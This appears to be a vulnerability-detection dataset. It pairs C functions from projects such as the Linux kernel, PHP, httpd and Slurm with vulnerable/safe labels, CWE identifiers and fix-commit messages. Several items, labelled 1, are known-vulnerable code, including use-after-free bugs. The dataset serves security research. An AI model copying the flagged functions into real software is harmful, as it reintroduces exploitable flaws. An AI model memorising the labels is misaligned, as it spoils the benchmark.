Z_STRVAL_P(offset), Z_STRLEN_P(offset)+1, &expr_ptr, sizeof(zval *), NULL); break; case IS_NULL: zend_hash_update(Z_ARRVAL_P(array_ptr), "", sizeof(""), &expr_ptr, sizeof(zval *), NULL); break; default: zend_error(E_WARNING, "Illegal offset type"); zval_ptr_dtor(&expr_ptr); /* do nothing */ break; } zval_dtor(free_op2.var); } else { zend_hash_next_index_insert(Z_ARRVAL_P(array_ptr), &expr_ptr, sizeof(zval *), NULL); } if (opline->extended_value) { } else { } ZEND_VM_NEXT_OPCODE(); }
0
[]
php-src
ce96fd6b0761d98353761bf78d5bfb55291179fd
16,752,974,408,008,992,000,000,000,000,000,000,000
78
- fix #39863, do not accept paths with NULL in them. See http://news.php.net/php.internals/50191, trunk will have the patch later (adding a macro and/or changing (some) APIs). Patch by Rasmus
/*
 * Unit test for the literal storage: randomly interns strings, magic
 * strings, and numbers, then verifies that looking the same literal up
 * twice yields the identical ecma_value_t (i.e. literals are deduplicated),
 * and that the empty string stays interned across iterations.
 */
main (void)
{
  TEST_INIT ();

  /* Per-iteration records of what was interned, so the second pass can
     re-look each entry up. ptrs[j] == NULL marks a number entry. */
  const lit_utf8_byte_t *ptrs[test_sub_iters];
  ecma_number_t numbers[test_sub_iters];
  lit_utf8_byte_t strings[test_sub_iters][max_characters_in_string + 1];
  lit_utf8_size_t lengths[test_sub_iters];

  jmem_init ();

  for (uint32_t i = 0; i < test_iters; i++)
  {
    memset (numbers, 0, sizeof (ecma_number_t) * test_sub_iters);
    memset (lengths, 0, sizeof (lit_utf8_size_t) * test_sub_iters);
    memset (ptrs, 0, sizeof (lit_utf8_byte_t *) * test_sub_iters);
    for (uint32_t j = 0; j < test_sub_iters; j++)
    {
      int type = rand () % 3;
      if (type == 0)
      {
        /* Random generated string. */
        lengths[j] = (lit_utf8_size_t) (rand () % max_characters_in_string + 1);
        generate_string (strings[j], lengths[j]);
        ecma_find_or_create_literal_string (strings[j], lengths[j]);
        strings[j][lengths[j]] = '\0';
        ptrs[j] = strings[j];
        TEST_ASSERT (ptrs[j]);
      }
      else if (type == 1)
      {
        /* Random built-in magic string. */
        lit_magic_string_id_t msi = (lit_magic_string_id_t) (rand () % LIT_NON_INTERNAL_MAGIC_STRING__COUNT);
        ptrs[j] = lit_get_magic_string_utf8 (msi);
        TEST_ASSERT (ptrs[j]);
        lengths[j] = (lit_utf8_size_t) lit_zt_utf8_string_size (ptrs[j]);
        ecma_find_or_create_literal_string (ptrs[j], lengths[j]);
      }
      else
      {
        /* Random number literal.  NOTE(review): `num` is interned but
           never stored into numbers[j], so the verification pass below
           re-checks 0.0 (the memset value) instead of `num` — looks
           unintentional; confirm upstream. */
        ecma_number_t num = generate_number ();
        lengths[j] = ecma_number_to_utf8_string (num, strings[j], max_characters_in_string);
        ecma_find_or_create_literal_number (num);
      }
    }

    /* Add empty string. */
    ecma_find_or_create_literal_string (NULL, 0);

    /* Verification pass: interning the same value again must return the
       same literal handle. */
    for (uint32_t j = 0; j < test_sub_iters; j++)
    {
      ecma_value_t lit1;
      ecma_value_t lit2;
      if (ptrs[j])
      {
        lit1 = ecma_find_or_create_literal_string (ptrs[j], lengths[j]);
        lit2 = ecma_find_or_create_literal_string (ptrs[j], lengths[j]);
        TEST_ASSERT (ecma_is_value_string (lit1));
        TEST_ASSERT (ecma_is_value_string (lit2));
        TEST_ASSERT (lit1 == lit2);
      }
      else
      {
        lit1 = ecma_find_or_create_literal_number (numbers[j]);
        lit2 = ecma_find_or_create_literal_number (numbers[j]);
        TEST_ASSERT (ecma_is_value_number (lit1));
        TEST_ASSERT (ecma_is_value_number (lit2));
        TEST_ASSERT (lit1 == lit2);
      }
    }

    /* Check empty string exists. */
    TEST_ASSERT (ecma_find_or_create_literal_string (NULL, 0) != JMEM_CP_NULL);
  }

  ecma_finalize_lit_storage ();
  jmem_finalize ();
  return 0;
} /* main */
1
[ "CWE-416" ]
jerryscript
3bcd48f72d4af01d1304b754ef19fe1a02c96049
18,951,495,909,198,342,000,000,000,000,000,000,000
78
Improve parse_identifier (#4691) Ascii string length is no longer computed during string allocation. JerryScript-DCO-1.0-Signed-off-by: Daniel Batiz [email protected]
kvm_pfn_t gfn_to_pfn_memslot_atomic(struct kvm_memory_slot *slot, gfn_t gfn) { return __gfn_to_pfn_memslot(slot, gfn, true, NULL, true, NULL, NULL); }
0
[ "CWE-119" ]
linux
f8be156be163a052a067306417cd0ff679068c97
143,196,951,646,798,850,000,000,000,000,000,000,000
4
KVM: do not allow mapping valid but non-reference-counted pages It's possible to create a region which maps valid but non-refcounted pages (e.g., tail pages of non-compound higher order allocations). These host pages can then be returned by gfn_to_page, gfn_to_pfn, etc., family of APIs, which take a reference to the page, which takes it from 0 to 1. When the reference is dropped, this will free the page incorrectly. Fix this by only taking a reference on valid pages if it was non-zero, which indicates it is participating in normal refcounting (and can be released with put_page). This addresses CVE-2021-22543. Signed-off-by: Nicholas Piggin <[email protected]> Tested-by: Paolo Bonzini <[email protected]> Cc: [email protected] Signed-off-by: Paolo Bonzini <[email protected]>
R_API ut64 rbin_java_verification_info_calc_size(RBinJavaVerificationObj *se) { ut64 sz = 1; if (!se) { return 0; } // r_buf_read_at (bin->b, offset, (ut8*)(&se->tag), 1) switch (se->tag) { case R_BIN_JAVA_STACKMAP_OBJECT: // r_buf_read_at (bin->b, offset+1, (ut8*)buf, 2) sz += 2; break; case R_BIN_JAVA_STACKMAP_UNINIT: // r_buf_read_at (bin->b, offset+1, (ut8*)buf, 2) sz += 2; break; } return sz; }
0
[ "CWE-119", "CWE-788" ]
radare2
6c4428f018d385fc80a33ecddcb37becea685dd5
94,104,356,271,232,140,000,000,000,000,000,000,000
18
Improve boundary checks to fix oobread segfaults ##crash * Reported by Cen Zhang via huntr.dev * Reproducer: bins/fuzzed/javaoob-havoc.class
/*
 * Retransmit one skb from the retransmit queue, resegmenting it to at most
 * `segs` segments at the current MSS.  Returns 0 on success or a negative
 * errno (-EAGAIN when throttled or out of window, -EBUSY when the skb is
 * still owned by the NIC queue, -ENOMEM, -EHOSTUNREACH on route failure,
 * or the tcp_transmit_skb() result).
 */
int __tcp_retransmit_skb(struct sock *sk, struct sk_buff *skb, int segs)
{
	struct inet_connection_sock *icsk = inet_csk(sk);
	struct tcp_sock *tp = tcp_sk(sk);
	unsigned int cur_mss;
	int diff, len, err;

	/* Inconclusive MTU probe */
	if (icsk->icsk_mtup.probe_size)
		icsk->icsk_mtup.probe_size = 0;

	/* Do not send more than we queued. 1/4 is reserved for possible
	 * copying overhead: fragmentation, tunneling, mangling etc.
	 */
	if (refcount_read(&sk->sk_wmem_alloc) >
	    min_t(u32, sk->sk_wmem_queued + (sk->sk_wmem_queued >> 2),
		  sk->sk_sndbuf))
		return -EAGAIN;

	if (skb_still_in_host_queue(sk, skb))
		return -EBUSY;

	/* Trim any portion that was already acked; fully-acked skbs must
	 * never reach this point. */
	if (before(TCP_SKB_CB(skb)->seq, tp->snd_una)) {
		if (before(TCP_SKB_CB(skb)->end_seq, tp->snd_una))
			BUG();
		if (tcp_trim_head(sk, skb, tp->snd_una - TCP_SKB_CB(skb)->seq))
			return -ENOMEM;
	}

	if (inet_csk(sk)->icsk_af_ops->rebuild_header(sk))
		return -EHOSTUNREACH; /* Routing failure or similar. */

	cur_mss = tcp_current_mss(sk);

	/* If receiver has shrunk his window, and skb is out of
	 * new window, do not retransmit it. The exception is the
	 * case, when window is shrunk to zero. In this case
	 * our retransmit serves as a zero window probe.
	 */
	if (!before(TCP_SKB_CB(skb)->seq, tcp_wnd_end(tp)) &&
	    TCP_SKB_CB(skb)->seq != tp->snd_una)
		return -EAGAIN;

	/* Resegment: either split the skb down to the `segs` budget, or fix
	 * up its pcount/GSO metadata for the current MSS. */
	len = cur_mss * segs;
	if (skb->len > len) {
		if (tcp_fragment(sk, TCP_FRAG_IN_RTX_QUEUE, skb, len,
				 cur_mss, GFP_ATOMIC))
			return -ENOMEM; /* We'll try again later. */
	} else {
		if (skb_unclone(skb, GFP_ATOMIC))
			return -ENOMEM;

		diff = tcp_skb_pcount(skb);
		tcp_set_skb_tso_segs(skb, cur_mss);
		diff -= tcp_skb_pcount(skb);
		if (diff)
			tcp_adjust_pcount(sk, skb, diff);
		if (skb->len < cur_mss)
			tcp_retrans_try_collapse(sk, skb, cur_mss);
	}

	/* RFC3168, section 6.1.1.1. ECN fallback */
	if ((TCP_SKB_CB(skb)->tcp_flags & TCPHDR_SYN_ECN) == TCPHDR_SYN_ECN)
		tcp_ecn_clear_syn(sk, skb);

	/* Update global and local TCP statistics. */
	segs = tcp_skb_pcount(skb);
	TCP_ADD_STATS(sock_net(sk), TCP_MIB_RETRANSSEGS, segs);
	if (TCP_SKB_CB(skb)->tcp_flags & TCPHDR_SYN)
		__NET_INC_STATS(sock_net(sk), LINUX_MIB_TCPSYNRETRANS);
	tp->total_retrans += segs;

	/* make sure skb->data is aligned on arches that require it
	 * and check if ack-trimming & collapsing extended the headroom
	 * beyond what csum_start can cover.
	 */
	if (unlikely((NET_IP_ALIGN && ((unsigned long)skb->data & 3)) ||
		     skb_headroom(skb) >= 0xFFFF)) {
		struct sk_buff *nskb;

		/* Transmit a private aligned copy; the original stays on
		 * the rtx queue, so only its timestamps get refreshed. */
		tcp_skb_tsorted_save(skb) {
			nskb = __pskb_copy(skb, MAX_TCP_HEADER, GFP_ATOMIC);
			err = nskb ? tcp_transmit_skb(sk, nskb, 0, GFP_ATOMIC) :
				     -ENOBUFS;
		} tcp_skb_tsorted_restore(skb);

		if (!err) {
			tcp_update_skb_after_send(tp, skb);
			tcp_rate_skb_sent(sk, skb);
		}
	} else {
		err = tcp_transmit_skb(sk, skb, 1, GFP_ATOMIC);
	}

	if (BPF_SOCK_OPS_TEST_FLAG(tp, BPF_SOCK_OPS_RETRANS_CB_FLAG))
		tcp_call_bpf_3arg(sk, BPF_SOCK_OPS_RETRANS_CB,
				  TCP_SKB_CB(skb)->seq, segs, err);

	if (likely(!err)) {
		TCP_SKB_CB(skb)->sacked |= TCPCB_EVER_RETRANS;
		trace_tcp_retransmit_skb(sk, skb);
	} else if (err != -EBUSY) {
		NET_INC_STATS(sock_net(sk), LINUX_MIB_TCPRETRANSFAIL);
	}
	return err;
}
1
[ "CWE-416" ]
linux
7f582b248d0a86bae5788c548d7bb5bca6f7691a
114,213,026,118,832,340,000,000,000,000,000,000,000
107
tcp: purge write queue in tcp_connect_init() syzkaller found a reliable way to crash the host, hitting a BUG() in __tcp_retransmit_skb() Malicous MSG_FASTOPEN is the root cause. We need to purge write queue in tcp_connect_init() at the point we init snd_una/write_seq. This patch also replaces the BUG() by a less intrusive WARN_ON_ONCE() kernel BUG at net/ipv4/tcp_output.c:2837! invalid opcode: 0000 [#1] SMP KASAN Dumping ftrace buffer: (ftrace buffer empty) Modules linked in: CPU: 0 PID: 5276 Comm: syz-executor0 Not tainted 4.17.0-rc3+ #51 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011 RIP: 0010:__tcp_retransmit_skb+0x2992/0x2eb0 net/ipv4/tcp_output.c:2837 RSP: 0000:ffff8801dae06ff8 EFLAGS: 00010206 RAX: ffff8801b9fe61c0 RBX: 00000000ffc18a16 RCX: ffffffff864e1a49 RDX: 0000000000000100 RSI: ffffffff864e2e12 RDI: 0000000000000005 RBP: ffff8801dae073a0 R08: ffff8801b9fe61c0 R09: ffffed0039c40dd2 R10: ffffed0039c40dd2 R11: ffff8801ce206e93 R12: 00000000421eeaad R13: ffff8801ce206d4e R14: ffff8801ce206cc0 R15: ffff8801cd4f4a80 FS: 0000000000000000(0000) GS:ffff8801dae00000(0063) knlGS:00000000096bc900 CS: 0010 DS: 002b ES: 002b CR0: 0000000080050033 CR2: 0000000020000000 CR3: 00000001c47b6000 CR4: 00000000001406f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <IRQ> tcp_retransmit_skb+0x2e/0x250 net/ipv4/tcp_output.c:2923 tcp_retransmit_timer+0xc50/0x3060 net/ipv4/tcp_timer.c:488 tcp_write_timer_handler+0x339/0x960 net/ipv4/tcp_timer.c:573 tcp_write_timer+0x111/0x1d0 net/ipv4/tcp_timer.c:593 call_timer_fn+0x230/0x940 kernel/time/timer.c:1326 expire_timers kernel/time/timer.c:1363 [inline] __run_timers+0x79e/0xc50 kernel/time/timer.c:1666 run_timer_softirq+0x4c/0x70 kernel/time/timer.c:1692 __do_softirq+0x2e0/0xaf5 kernel/softirq.c:285 invoke_softirq kernel/softirq.c:365 [inline] irq_exit+0x1d1/0x200 kernel/softirq.c:405 exiting_irq 
arch/x86/include/asm/apic.h:525 [inline] smp_apic_timer_interrupt+0x17e/0x710 arch/x86/kernel/apic/apic.c:1052 apic_timer_interrupt+0xf/0x20 arch/x86/entry/entry_64.S:863 Fixes: cf60af03ca4e ("net-tcp: Fast Open client - sendmsg(MSG_FASTOPEN)") Signed-off-by: Eric Dumazet <[email protected]> Cc: Yuchung Cheng <[email protected]> Cc: Neal Cardwell <[email protected]> Reported-by: syzbot <[email protected]> Acked-by: Neal Cardwell <[email protected]> Signed-off-by: David S. Miller <[email protected]>
TEST_F(HttpConnectionManagerImplTest, TestDownstreamProtocolErrorAccessLog) { std::shared_ptr<AccessLog::MockInstance> handler(new NiceMock<AccessLog::MockInstance>()); access_logs_ = {handler}; setup(false, ""); EXPECT_CALL(*handler, log(_, _, _, _)) .WillOnce(Invoke([](const HeaderMap*, const HeaderMap*, const HeaderMap*, const StreamInfo::StreamInfo& stream_info) { EXPECT_FALSE(stream_info.responseCode()); EXPECT_TRUE(stream_info.hasAnyResponseFlag()); EXPECT_TRUE(stream_info.hasResponseFlag(StreamInfo::ResponseFlag::DownstreamProtocolError)); })); NiceMock<MockResponseEncoder> encoder; EXPECT_CALL(*codec_, dispatch(_)).WillRepeatedly(Invoke([&](Buffer::Instance&) -> Http::Status { conn_manager_->newStream(encoder); return codecProtocolError("protocol error"); })); Buffer::OwnedImpl fake_input("1234"); conn_manager_->onData(fake_input, false); }
0
[ "CWE-400" ]
envoy
0e49a495826ea9e29134c1bd54fdeb31a034f40c
246,129,513,393,889,130,000,000,000,000,000,000,000
22
http/2: add stats and stream flush timeout (#139) This commit adds a new stream flush timeout to guard against a remote server that does not open window once an entire stream has been buffered for flushing. Additional stats have also been added to better understand the codecs view of active streams as well as amount of data buffered. Signed-off-by: Matt Klein <[email protected]>
static const struct oid_to_string *get_oid_entry(const char *oid) { unsigned int i = 0; unsigned len = strlen(oid); do { if (len == _oid2str[i].oid_size && strcmp(_oid2str[i].oid, oid) == 0) return &_oid2str[i]; i++; } while (_oid2str[i].oid != NULL); return NULL; }
0
[]
gnutls
272854367efc130fbd4f1a51840d80c630214e12
261,287,808,942,391,000,000,000,000,000,000,000,000
15
Reset the output value on error in _gnutls_x509_dn_to_string() Reported by Kurt Roeckx.
AP_DECLARE(int) ap_setup_client_block(request_rec *r, int read_policy) { const char *tenc = apr_table_get(r->headers_in, "Transfer-Encoding"); const char *lenp = apr_table_get(r->headers_in, "Content-Length"); r->read_body = read_policy; r->read_chunked = 0; r->remaining = 0; if (tenc) { if (strcasecmp(tenc, "chunked")) { ap_log_rerror(APLOG_MARK, APLOG_INFO, 0, r, APLOGNO(01592) "Unknown Transfer-Encoding %s", tenc); return HTTP_NOT_IMPLEMENTED; } if (r->read_body == REQUEST_CHUNKED_ERROR) { ap_log_rerror(APLOG_MARK, APLOG_INFO, 0, r, APLOGNO(01593) "chunked Transfer-Encoding forbidden: %s", r->uri); return (lenp) ? HTTP_BAD_REQUEST : HTTP_LENGTH_REQUIRED; } r->read_chunked = 1; } else if (lenp) { char *endstr; if (apr_strtoff(&r->remaining, lenp, &endstr, 10) || *endstr || r->remaining < 0) { r->remaining = 0; ap_log_rerror(APLOG_MARK, APLOG_INFO, 0, r, APLOGNO(01594) "Invalid Content-Length"); return HTTP_BAD_REQUEST; } } if ((r->read_body == REQUEST_NO_BODY) && (r->read_chunked || (r->remaining > 0))) { ap_log_rerror(APLOG_MARK, APLOG_INFO, 0, r, APLOGNO(01595) "%s with body is not allowed for %s", r->method, r->uri); return HTTP_REQUEST_ENTITY_TOO_LARGE; } #ifdef AP_DEBUG { /* Make sure ap_getline() didn't leave any droppings. */ core_request_config *req_cfg = (core_request_config *)ap_get_core_module_config(r->request_config); AP_DEBUG_ASSERT(APR_BRIGADE_EMPTY(req_cfg->bb)); } #endif return OK; }
0
[ "CWE-20" ]
httpd
a6027e56924bb6227c1fdbf6f91e7e2438338be6
115,543,351,081,565,060,000,000,000,000,000,000,000
53
Limit accepted chunk-size to 2^63-1 and be strict about chunk-ext authorized characters. Submitted by: Yann Ylavic git-svn-id: https://svn.apache.org/repos/asf/httpd/httpd/trunk@1684513 13f79535-47bb-0310-9956-ffa450edef68
xrdp_mm_get_sesman_port(char* port, int port_bytes) { int fd; int error; int index; char* val; char cfg_file[256]; struct list* names; struct list* values; g_memset(cfg_file,0,sizeof(char) * 256); /* default to port 3350 */ g_strncpy(port, "3350", port_bytes - 1); /* see if port is in xrdp.ini file */ g_snprintf(cfg_file, 255, "%s/sesman.ini", XRDP_CFG_PATH); fd = g_file_open(cfg_file); if (fd > 0) { names = list_create(); names->auto_free = 1; values = list_create(); values->auto_free = 1; if (file_read_section(fd, "Globals", names, values) == 0) { for (index = 0; index < names->count; index++) { val = (char*)list_get_item(names, index); if (val != 0) { if (g_strcasecmp(val, "ListenPort") == 0) { val = (char*)list_get_item(values, index); error = g_atoi(val); if ((error > 0) && (error < 65000)) { g_strncpy(port, val, port_bytes - 1); } break; } } } } list_delete(names); list_delete(values); g_file_close(fd); } return 0; }
0
[]
xrdp
d8f9e8310dac362bb9578763d1024178f94f4ecc
301,111,312,089,159,700,000,000,000,000,000,000,000
49
move temp files from /tmp to /tmp/.xrdp
inline static void _slurm_rpc_dump_spank(slurm_msg_t * msg) { int rc = SLURM_SUCCESS; spank_env_request_msg_t *spank_req_msg = (spank_env_request_msg_t *) msg->data; spank_env_responce_msg_t *spank_resp_msg = NULL; /* Locks: read job */ slurmctld_lock_t job_read_lock = { NO_LOCK, READ_LOCK, NO_LOCK, NO_LOCK, NO_LOCK }; uid_t uid = g_slurm_auth_get_uid(msg->auth_cred, slurmctld_config.auth_info); slurm_msg_t response_msg; DEF_TIMERS; START_TIMER; debug("Processing RPC: REQUEST_SPANK_ENVIRONMENT from uid=%d JobId=%u", uid, spank_req_msg->job_id); if (!validate_slurm_user(uid)) { rc = ESLURM_USER_ID_MISSING; error("Security violation, REQUEST_SPANK_ENVIRONMENT RPC " "from uid=%d", uid); } if (rc == SLURM_SUCCESS) { /* do RPC call */ struct job_record *job_ptr; uint32_t i; lock_slurmctld(job_read_lock); job_ptr = find_job_record(spank_req_msg->job_id); if (job_ptr) { spank_resp_msg = xmalloc(sizeof(spank_env_responce_msg_t)); spank_resp_msg->spank_job_env_size = job_ptr->spank_job_env_size; spank_resp_msg->spank_job_env = xmalloc( spank_resp_msg->spank_job_env_size * sizeof(char *)); for (i = 0; i < spank_resp_msg->spank_job_env_size; i++) spank_resp_msg->spank_job_env[i] = xstrdup( job_ptr->spank_job_env[i]); } else { rc = ESLURM_INVALID_JOB_ID; } unlock_slurmctld(job_read_lock); } END_TIMER2("_slurm_rpc_dump_spank"); if (rc == SLURM_SUCCESS) { slurm_msg_t_init(&response_msg); response_msg.flags = msg->flags; response_msg.protocol_version = msg->protocol_version; response_msg.address = msg->address; response_msg.conn = msg->conn; response_msg.msg_type = RESPONCE_SPANK_ENVIRONMENT; response_msg.data = spank_resp_msg; slurm_send_node_msg(msg->conn_fd, &response_msg); slurm_free_spank_env_responce_msg(spank_resp_msg); } else { slurm_send_rc_msg(msg, rc); } }
0
[ "CWE-20" ]
slurm
033dc0d1d28b8d2ba1a5187f564a01c15187eb4e
101,653,514,173,867,360,000,000,000,000,000,000,000
62
Fix insecure handling of job requested gid. Only trust MUNGE signed values, unless the RPC was signed by SlurmUser or root. CVE-2018-10995.
set_directory_hook () { if (dircomplete_expand) { rl_directory_completion_hook = bash_directory_completion_hook; rl_directory_rewrite_hook = (rl_icppfunc_t *)0; } else { rl_directory_rewrite_hook = bash_directory_completion_hook; rl_directory_completion_hook = (rl_icppfunc_t *)0; } }
0
[ "CWE-20" ]
bash
4f747edc625815f449048579f6e65869914dd715
86,827,386,348,365,960,000,000,000,000,000,000,000
13
Bash-4.4 patch 7
int kernel_execve(const char *kernel_filename, const char *const *argv, const char *const *envp) { struct filename *filename; struct linux_binprm *bprm; int fd = AT_FDCWD; int retval; filename = getname_kernel(kernel_filename); if (IS_ERR(filename)) return PTR_ERR(filename); bprm = alloc_bprm(fd, filename); if (IS_ERR(bprm)) { retval = PTR_ERR(bprm); goto out_ret; } retval = count_strings_kernel(argv); if (retval < 0) goto out_free; bprm->argc = retval; retval = count_strings_kernel(envp); if (retval < 0) goto out_free; bprm->envc = retval; retval = bprm_stack_limits(bprm); if (retval < 0) goto out_free; retval = copy_string_kernel(bprm->filename, bprm); if (retval < 0) goto out_free; bprm->exec = bprm->p; retval = copy_strings_kernel(bprm->envc, envp, bprm); if (retval < 0) goto out_free; retval = copy_strings_kernel(bprm->argc, argv, bprm); if (retval < 0) goto out_free; retval = bprm_execve(bprm, fd, filename, 0); out_free: free_bprm(bprm); out_ret: putname(filename); return retval; }
0
[]
linux
0f2122045b946241a9e549c2a76cea54fa58a7ff
154,073,095,304,461,870,000,000,000,000,000,000,000
52
io_uring: don't rely on weak ->files references Grab actual references to the files_struct. To avoid circular references issues due to this, we add a per-task note that keeps track of what io_uring contexts a task has used. When the tasks execs or exits its assigned files, we cancel requests based on this tracking. With that, we can grab proper references to the files table, and no longer need to rely on stashing away ring_fd and ring_file to check if the ring_fd may have been closed. Cc: [email protected] # v5.5+ Reviewed-by: Pavel Begunkov <[email protected]> Signed-off-by: Jens Axboe <[email protected]>
get_mib_parse_error_count(void) { return erroneousMibs; }
0
[ "CWE-59", "CWE-61" ]
net-snmp
4fd9a450444a434a993bc72f7c3486ccce41f602
172,816,828,701,069,680,000,000,000,000,000,000,000
4
CHANGES: snmpd: Stop reading and writing the mib_indexes/* files Caching directory contents is something the operating system should do and is not something Net-SNMP should do. Instead of storing a copy of the directory contents in ${tmp_dir}/mib_indexes/${n}, always scan a MIB directory.
updateSelectOption(FormItemList *fi, FormSelectOptionItem *item) { int i; if (fi == NULL || item == NULL) return; for (i = 0; item != NULL; i++, item = item->next) { if (i == fi->selected) item->checked = TRUE; else item->checked = FALSE; } }
0
[ "CWE-119" ]
w3m
9f0bdcfdf061db3520bd1f112bdc5e83acdec4be
108,788,781,012,151,380,000,000,000,000,000,000,000
13
Prevent segfault for formUpdateBuffer Bug-Debian: https://github.com/tats/w3m/issues/9 Bug-Debian: https://github.com/tats/w3m/issues/10
static void hci_cc_write_page_scan_activity(struct hci_dev *hdev, struct sk_buff *skb) { u8 status = *((u8 *) skb->data); struct hci_cp_write_page_scan_activity *sent; BT_DBG("%s status 0x%2.2x", hdev->name, status); if (status) return; sent = hci_sent_cmd_data(hdev, HCI_OP_WRITE_PAGE_SCAN_ACTIVITY); if (!sent) return; hdev->page_scan_interval = __le16_to_cpu(sent->interval); hdev->page_scan_window = __le16_to_cpu(sent->window); }
0
[ "CWE-290" ]
linux
3ca44c16b0dcc764b641ee4ac226909f5c421aa3
283,116,893,238,049,500,000,000,000,000,000,000,000
18
Bluetooth: Consolidate encryption handling in hci_encrypt_cfm This makes hci_encrypt_cfm calls hci_connect_cfm in case the connection state is BT_CONFIG so callers don't have to check the state. Signed-off-by: Luiz Augusto von Dentz <[email protected]> Signed-off-by: Marcel Holtmann <[email protected]>
OperatorGet(const char *operatorName, Oid operatorNamespace, Oid leftObjectId, Oid rightObjectId, bool *defined) { HeapTuple tup; Oid operatorObjectId; tup = SearchSysCache4(OPERNAMENSP, PointerGetDatum(operatorName), ObjectIdGetDatum(leftObjectId), ObjectIdGetDatum(rightObjectId), ObjectIdGetDatum(operatorNamespace)); if (HeapTupleIsValid(tup)) { RegProcedure oprcode = ((Form_pg_operator) GETSTRUCT(tup))->oprcode; operatorObjectId = HeapTupleGetOid(tup); *defined = RegProcedureIsValid(oprcode); ReleaseSysCache(tup); } else { operatorObjectId = InvalidOid; *defined = false; } return operatorObjectId; }
0
[ "CWE-94" ]
postgres
f52d2fbd8c62f667191b61228acf9d8aa53607b9
328,191,291,806,812,740,000,000,000,000,000,000,000
30
In extensions, don't replace objects not belonging to the extension. Previously, if an extension script did CREATE OR REPLACE and there was an existing object not belonging to the extension, it would overwrite the object and adopt it into the extension. This is problematic, first because the overwrite is probably unintentional, and second because we didn't change the object's ownership. Thus a hostile user could create an object in advance of an expected CREATE EXTENSION command, and would then have ownership rights on an extension object, which could be modified for trojan-horse-type attacks. Hence, forbid CREATE OR REPLACE of an existing object unless it already belongs to the extension. (Note that we've always forbidden replacing an object that belongs to some other extension; only the behavior for previously-free-standing objects changes here.) For the same reason, also fail CREATE IF NOT EXISTS when there is an existing object that doesn't belong to the extension. Our thanks to Sven Klemm for reporting this problem. Security: CVE-2022-2625
int bnx2x_set_vlan_one(struct bnx2x *bp, u16 vlan, struct bnx2x_vlan_mac_obj *obj, bool set, unsigned long *ramrod_flags) { int rc; struct bnx2x_vlan_mac_ramrod_params ramrod_param; memset(&ramrod_param, 0, sizeof(ramrod_param)); /* Fill general parameters */ ramrod_param.vlan_mac_obj = obj; ramrod_param.ramrod_flags = *ramrod_flags; /* Fill a user request section if needed */ if (!test_bit(RAMROD_CONT, ramrod_flags)) { ramrod_param.user_req.u.vlan.vlan = vlan; /* Set the command: ADD or DEL */ if (set) ramrod_param.user_req.cmd = BNX2X_VLAN_MAC_ADD; else ramrod_param.user_req.cmd = BNX2X_VLAN_MAC_DEL; } rc = bnx2x_config_vlan_mac(bp, &ramrod_param); if (rc == -EEXIST) { /* Do not treat adding same vlan as error. */ DP(BNX2X_MSG_SP, "Failed to schedule ADD operations: %d\n", rc); rc = 0; } else if (rc < 0) { BNX2X_ERR("%s VLAN failed\n", (set ? "Set" : "Del")); } return rc; }
0
[ "CWE-20" ]
linux
8914a595110a6eca69a5e275b323f5d09e18f4f9
42,351,257,290,509,700,000,000,000,000,000,000,000
35
bnx2x: disable GSO where gso_size is too big for hardware If a bnx2x card is passed a GSO packet with a gso_size larger than ~9700 bytes, it will cause a firmware error that will bring the card down: bnx2x: [bnx2x_attn_int_deasserted3:4323(enP24p1s0f0)]MC assert! bnx2x: [bnx2x_mc_assert:720(enP24p1s0f0)]XSTORM_ASSERT_LIST_INDEX 0x2 bnx2x: [bnx2x_mc_assert:736(enP24p1s0f0)]XSTORM_ASSERT_INDEX 0x0 = 0x00000000 0x25e43e47 0x00463e01 0x00010052 bnx2x: [bnx2x_mc_assert:750(enP24p1s0f0)]Chip Revision: everest3, FW Version: 7_13_1 ... (dump of values continues) ... Detect when the mac length of a GSO packet is greater than the maximum packet size (9700 bytes) and disable GSO. Signed-off-by: Daniel Axtens <[email protected]> Reviewed-by: Eric Dumazet <[email protected]> Signed-off-by: David S. Miller <[email protected]>
static inline int decode_attr_length(struct xdr_stream *xdr, uint32_t *attrlen, __be32 **savep) { __be32 *p; READ_BUF(4); READ32(*attrlen); *savep = xdr->p; return 0; }
0
[ "CWE-703" ]
linux
dc0b027dfadfcb8a5504f7d8052754bf8d501ab9
241,714,726,768,788,880,000,000,000,000,000,000,000
9
NFSv4: Convert the open and close ops to use fmode Signed-off-by: Trond Myklebust <[email protected]>
max3421_set_address(struct usb_hcd *hcd, struct usb_device *dev, int epnum, int force_toggles) { struct max3421_hcd *max3421_hcd = hcd_to_max3421(hcd); int old_epnum, same_ep, rcvtog, sndtog; struct usb_device *old_dev; u8 hctl; old_dev = max3421_hcd->loaded_dev; old_epnum = max3421_hcd->loaded_epnum; same_ep = (dev == old_dev && epnum == old_epnum); if (same_ep && !force_toggles) return; if (old_dev && !same_ep) { /* save the old end-points toggles: */ u8 hrsl = spi_rd8(hcd, MAX3421_REG_HRSL); rcvtog = (hrsl >> MAX3421_HRSL_RCVTOGRD_BIT) & 1; sndtog = (hrsl >> MAX3421_HRSL_SNDTOGRD_BIT) & 1; /* no locking: HCD (i.e., we) own toggles, don't we? */ usb_settoggle(old_dev, old_epnum, 0, rcvtog); usb_settoggle(old_dev, old_epnum, 1, sndtog); } /* setup new endpoint's toggle bits: */ rcvtog = usb_gettoggle(dev, epnum, 0); sndtog = usb_gettoggle(dev, epnum, 1); hctl = (BIT(rcvtog + MAX3421_HCTL_RCVTOG0_BIT) | BIT(sndtog + MAX3421_HCTL_SNDTOG0_BIT)); max3421_hcd->loaded_epnum = epnum; spi_wr8(hcd, MAX3421_REG_HCTL, hctl); /* * Note: devnum for one and the same device can change during * address-assignment so it's best to just always load the * address whenever the end-point changed/was forced. */ max3421_hcd->loaded_dev = dev; spi_wr8(hcd, MAX3421_REG_PERADDR, dev->devnum); }
1
[ "CWE-416" ]
linux
b5fdf5c6e6bee35837e160c00ac89327bdad031b
164,445,247,275,147,700,000,000,000,000,000,000,000
43
